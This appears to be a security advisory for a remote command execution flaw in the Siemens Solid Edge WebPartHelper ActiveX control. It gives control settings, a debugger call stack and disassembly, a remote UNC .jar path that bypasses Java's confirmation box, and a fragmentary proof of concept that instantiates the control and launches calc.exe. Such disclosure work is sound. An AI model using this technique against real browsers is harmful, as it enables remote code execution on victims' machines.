SIEMENS Solid Edge ST4/ST5 WebPartHelper ActiveX Control
RFMSsvs!JShellExecuteEx Remote Command Execution
Tested against: Microsoft Windows Server 2003 r2 sp2
Microsoft Windows XP sp3
Microsoft Windows 7
Internet Explorer 8
Software description:
vendor site:
Download url:
File tested: SolidEdgeV104ENGLISH_32Bit.exe
The mentioned software installs an ActiveX control with
the following settings:
CLSID: {DD568718-FF20-48EA-973F-0BD5C9FCA522}
Progid: SolidEdge.WebPartHelper.1
Binary Path: C:\Program Files\Solid Edge ST4\Program\WPHelper.dll
Implements IObjectSafety: True
Safe For Initialization (IObjectSafety): False
Safe For Scripting (IObjectSafety): True
This control *implements* IObjectSafety: IE will query through the IObjectSafety
interface for "Safe for Initialization with data" and "Safe For Scripting".
According to IObjectSafety interface, this control is Safe for Scripting
then IEwill allow scripting of this control according to browser
security settings.
the WebPartHelper Class offers the OpenInEditor() method, see typelib:
/* DISPID=8 */
function OpenInEditor(
/* VT_VARIANT [12] [in] */ $URL
By passing an null session share path to the URL argument of this method
is possible to launch an arbitrary executable.
This is because of a ShellExecuteExW() call inside RFMSsvs.dll
Call stack when ShellExecuteExW() is called:
AddressStackProcedure / arguments Called from Frame
01B7E140 04AC9F0E SHELL32.ShellExecuteExW RFMSsvs.04AC9F0801B7F280
01B7F284 022B71AD ? <jmp.&RFMSsvs.JShellExecuteEx>WPHelper.022B71A8 01B7F280
01B7F560 022B85B6 WPHelper.022B6D70 WPHelper.022B85B1 01B7F55C
01B7F5D4 022B87A5 ? WPHelper.022B8380 WPHelper.022B87A0 01B7F5D0
01B7F620 022B89CB WPHelper.022B8710 WPHelper.022B89C6 01B7F61C
01B7F668 7D0E5186 Includes WPHelper.022B89CBOLEAUT32.7D0E5184 01B7F664
01B7F690 7D0F4ACF ? OLEAUT32.DispCallFunc OLEAUT32.7D0F4ACA 01B7F68C
01B7F720 022B58C3 Includes OLEAUT32.7D0F4ACFWPHelper.022B58C1 01B7F71C
01B7F748 40302C02 Includes WPHelper.022B58C3jscript.40302BFF01B7F744
01B7F784 40302B6F jscript.40302B90jscript.40302B6A01B7F780
01B7F7C0 40302AFA jscript.40302B2Ejscript.40302AF501B7F7BC
01B7F834 40303555 ? jscript.40302A88jscript.4030355001B7F830
01B7F878 40301221 jscript.4030122Ajscript.4030121C01B7F874
01B7F8B8 403011D6 jscript.403011E1jscript.403011D101B7F8B4
01B7F8DC 4030312D jscript.40301182jscript.4030312801B7F8D8
022B718A 899D 74FDFFFFmov dword ptr ss:[ebp-28C],ebx
022B7190 8D85 D8FDFFFFlea eax,dword ptr ss:[ebp-228]
022B7196 50 push eax
022B7197 8D8D 60FDFFFFlea ecx,dword ptr ss:[ebp-2A0]
022B719D 51 push ecx
022B719E C785 7CFDFFFF 01>mov dword ptr ss:[ebp-284],1
022B71A8 E8 ADBB0100call <jmp.&RFMSsvs.JShellExecuteEx>
04AC9ECF 8B85 A4EFFFFFmov eax,dword ptr ss:[ebp-105C]
04AC9ED5 8D8D 4CEFFFFFlea ecx,dword ptr ss:[ebp-10B4]
04AC9EDB 8946 24mov dword ptr ds:[esi+24],eax
04AC9EDE FF15 0CE3CB04call dword ptr ds:[<&JUtil.??BGUserText@@QBEPB_WXZ>]; JUtil.??BGUserText@@QBEPB_WXZ
04AC9EE4 8946 10mov dword ptr ds:[esi+10],eax
04AC9EE7 C645 FC 02 mov byte ptr ss:[ebp-4],2
04AC9EEB 8D8D D8EEFFFFlea ecx,dword ptr ss:[ebp-1128]
04AC9EF1 E8 6A89F1FFcall RFMSsvs.??1JrfmsFileName@@QAE@XZ
04AC9EF6 EB 0Fjmp short RFMSsvs.04AC9F07
04AC9EF8 8D8D 84EFFFFFlea ecx,dword ptr ss:[ebp-107C]
04AC9EFE FF15 0CE3CB04call dword ptr ds:[<&JUtil.??BGUserText@@QBEPB_WXZ>]; JUtil.??BGUserText@@QBEPB_WXZ
04AC9F04 8946 10mov dword ptr ds:[esi+10],eax; eax -> "\\\uncshare\CmdExec.jar"
04AC9F07 56 push esi
04AC9F08 FF15 E8E6CB04call dword ptr ds:[<&SHELL32.ShellExecuteExW>]; SHELL32.ShellExecuteExW
As attachment, proof of concept code.
Note that by pointing OpenInEditor() (and consequently ShellExecuteExW() )
to a remote .jar file as handled in JRE/JDK7u21 is possible to bypass
the usual confirmation box.
SIEMENS Solid Edge WebPartHelper ActiveX Control RFMSsvs!JShellExecuteEx
Remote Command Execution PoC
CLSID: {DD568718-FF20-48EA-973F-0BD5C9FCA522}
Progid: SolidEdge.WebPartHelper.1
Binary Path: C:\Program Files\Solid Edge ST4\Program\WPHelper.dll
Implements IObjectSafety: True
Safe For Initialization (IObjectSafety): False
Safe For Scripting (IObjectSafety): True
<!-- saved from url=(0014)about:internet -->
var obj = new ActiveXObject("SolidEdge.WebPartHelper.1");
//launch calc.exe
//bypass the confirmation box, JRE/JDK7u21